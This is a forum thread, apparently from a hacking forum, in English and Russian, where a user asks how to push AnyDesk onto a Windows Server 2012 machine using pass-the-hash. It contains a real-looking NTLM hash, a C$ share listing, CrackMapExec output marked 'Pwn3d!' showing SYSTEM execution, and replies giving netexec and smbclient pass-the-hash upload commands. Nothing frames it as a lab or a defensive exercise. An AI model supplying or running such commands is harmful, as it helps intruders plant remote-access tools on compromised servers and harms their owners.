pth-smbclient help

[Sec13B]

pth-smbclient

GitHub - byt3bl33d3r/pth-toolkit: Modified version of the passing-the-hash tool collection made to work straight out of the box

Modified version of the passing-the-hash tool collection made to work straight out of the box - byt3bl33d3r/pth-toolkit

github.com

pth-smbclient -U Guest%aad3b435b51404eeaad3b435b51404ee:8f89bfadcb04e66717efbb4893256de2 //192.168.0.123/c$ --directory ProgramData -c 'put "/home/xss/AnyDesk2.exe"'
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
NT_STATUS_OBJECT_PATH_NOT_FOUND opening remote file \ProgramData\home\xss\AnyDesk2.exe

How i upload anydesk from linux to windows server with pth-smbclient.

Thank you

└─$ pth-smbclient -U Guest%aad3b435b51404eeaad3b435b51404ee:8f89bfadcb04e66717efbb4893256de2 //192.168.0.123/c$ 
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Try "help" to get a list of possible commands.
smb: \> dir
  $MfeDeepRem                        DH        0  Thu Apr 29 03:55:28 2021
  $Recycle.Bin                      DHS        0  Wed Sep 11 06:19:05 2024
  A                                   D        0  Thu Aug 28 06:01:40 2014
  amd64                               D        0  Thu Jun 18 10:37:16 2015
  bootmgr                          AHSR   398156  Wed Jul 25 23:44:30 2012
  BOOTNXT                           AHS        1  Sat Jun  2 10:30:55 2012
  Documents and Settings          DHSrn        0  Thu Jul 26 03:14:09 2012
  Install                             D        0  Tue Jul  2 02:27:48 2013
  pagefile.sys                      AHS 1275068416  Thu Sep 26 17:07:38 2024
  PerfLogs                            D        0  Tue Aug 27 07:53:43 2024
  Program Files                      DR        0  Tue Mar 17 06:06:32 2020
  Program Files (x86)                 D        0  Tue May 18 09:02:29 2021
  ProgramData                       DHn        0  Sat Sep 28 03:43:52 2024
  PURGE                               D        0  Thu Aug 13 04:27:59 2015
  Quarantine                          D        0  Tue Aug 27 03:10:59 2024
  RemoteInstall.log                   A      231  Wed Aug 14 04:53:53 2013
  Software                            D        0  Fri Jun 12 06:42:38 2015
  sxSRTe                              A        0  Sat Sep 28 03:41:30 2024
  System Volume Information         DHS        0  Sun May  6 19:42:21 2018
  temp                                D        0  Wed Aug 28 11:59:04 2024
  tmuninst.ini                        A       21  Wed Aug 14 04:53:32 2013
  uJhBCq                              A      118  Sat Sep 28 03:32:57 2024
  Users                              DR        0  Wed Sep 11 06:18:21 2024
  Windows                             D        0  Sat Sep 28 03:30:13 2024

                15638527 blocks of size 4096. 10422211 blocks available
smb: \>

 

[Эрмано]

Уверен, что правильно команду на подключение отдал? типо: user%hash, а не user@hash

 

[Sec13B]

Уверен, что правильно команду на подключение отдал? типо: user%hash, а не user@hash

with @ ask for plain password

 

[zLeak3r]

Firstly, Are you sure "Guest" user has permission to write C:/ folder?
If yes, try this command. It is netexec, installed on kali linux by default. Check temp folder.

nxc smb 192.168.0.123 -u="Guest" -H="8f89bfadcb04e66717efbb4893256de2" --local-auth --put-file /home/xss/AnyDesk2.exe \\windows\temp\anydesk2.exe

 

[Эрмано]

\ProgramData\home\xss\AnyDesk2.exe

Как видишь он ищет файл в ProgrammData на целевой машине, а не на твоей, попробуй просто подрубиться по SMB и закинуть, а не командой

 

[Sec13B]

┌──(kali㉿kali)-[~/CrackMapExec]

└─$ poetry run crackmapexec smb 192.168.0.123 -u Guest -H 8f89bfadcb04e66717efbb4893256de2 --local-auth -x 'whoami'                                             
SMB         192.168.0.123   445    PROServer01     [*] Windows Server 2012 Standard 9200 (name:PROServer01) (domain:PROServer01) (signing:False) (SMBv1:True)
SMB         192.168.0.123   445    PROServer01     [+] PROServer01\Guest:8f89bfadcb04e66717efbb4893256de2 (Pwn3d!)
SMB         192.168.0.123   445    PROServer01     [+] Executed command via atexec
SMB         192.168.0.123   445    PROServer01     nt authority\system
┌──(kali㉿kali)-[~/CrackMapExec]

 

[Sec13B]

Firstly, Are you sure "Guest" user has permission to write C:/ folder?
If yes, try this command. It is netexec, installed on kali linux by default. Check temp folder.

nxc smb 192.168.0.123 -u="Guest" -H="8f89bfadcb04e66717efbb4893256de2" --local-auth --put-file /home/xss/AnyDesk2.exe \\windows\temp\anydesk2.exe

--local-auth --put-file "/home/kali/CrackMapExec/AnyDesk2.exe" "c:\windows\temp\anydesk2.exe"
[-] Error writing file to share C$: SMB SessionError: code: 0xc0000033 - STATUS_OBJECT_NAME_INVALID - The object name is invalid.


--local-auth --put-file "/home/kali/CrackMapExec/AnyDesk2.exe" "c:\temp\anydesk2.exe"
[-] Error writing file to share C$: SMB SessionError: code: 0xc0000033 - STATUS_OBJECT_NAME_INVALID - The object name is invalid.

 

[ymmfty0]

smbclient умет в Pass-the-hash ```smbclient //10.10.10.10/IPC$ -U Guest --pw-nt-hash HASH``` , а потом просто делаешь put и имя файла